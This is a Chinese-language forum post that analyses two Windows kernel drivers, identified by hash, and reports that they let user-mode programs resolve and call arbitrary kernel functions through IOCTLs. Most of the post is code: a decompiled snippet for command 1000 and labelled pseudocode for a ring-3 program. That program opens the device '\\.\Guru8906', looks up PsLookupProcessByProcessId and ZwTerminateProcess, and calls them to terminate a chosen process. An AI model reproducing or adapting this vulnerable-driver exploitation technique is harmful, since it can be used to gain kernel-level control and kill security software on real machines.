本帖最后由 DisaPDB 于 2026-4-18 12:54 编辑
6ae294cb5c71118350342e6a26350d0e95ea23d0548125b09056efa0ea19bf45.sys
一个内核模式状态机,v10 是从 MasterIrp->Flags 转换来的函数指针,完全由用户态控制。
用户可以通过 IOCTL 让内核执行任意地址的函数
17aae57cf6255c7eb169bf62ea67376d9708976eb7831f8cdd0ea38bdcb37dc4.sys
这个MasterIrp结构可以直接让用户态读取任意指针和内存地址执行操作
- if ( *(_QWORD *)&MasterIrp->Type == 1000LL )
- {
- RtlInitAnsiString(&SourceString, (PCSZ)&MasterIrp->MdlAddress);
- RtlAnsiStringToUnicodeString(&DestinationString, &SourceString, 1);
- SystemRoutineAddress = MmGetSystemRoutineAddress(&DestinationString);
- MasterIrp->MdlAddress = SystemRoutineAddress;
- }
配合命令1000获取任意函数地址,用户态可实现任意内核操作
也就是说,ring3程序可以这么写……(伪代码)
- int main()
- {
- HANDLE hDevice = CreateFileW(L"\\\\.\\Guru8906", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
- if (hDevice == INVALID_HANDLE_VALUE) return 1;
- ULONG_PTR pPsGetCurrentProcess, pPsLookupProcessByProcessId, pZwTerminateProcess;
- GetKernelFunctionAddress(hDevice, "PsGetCurrentProcess", &pPsGetCurrentProcess);
- GetKernelFunctionAddress(hDevice, "PsLookupProcessByProcessId", &pPsLookupProcessByProcessId);
- GetKernelFunctionAddress(hDevice, "ZwTerminateProcess", &pZwTerminateProcess);
- ULONG_PTR pTargetEprocess = 0;
- CallKernelFunction(hDevice, pPsLookupProcessByProcessId, 1234, (ULONG_PTR)&pTargetEprocess, 0,0,0, NULL);
- CallKernelFunction(hDevice, pZwTerminateProcess, pTargetEprocess, 0, 0,0,0, NULL);
- CloseHandle(hDevice);
- return 0;
- }
|
发表于 
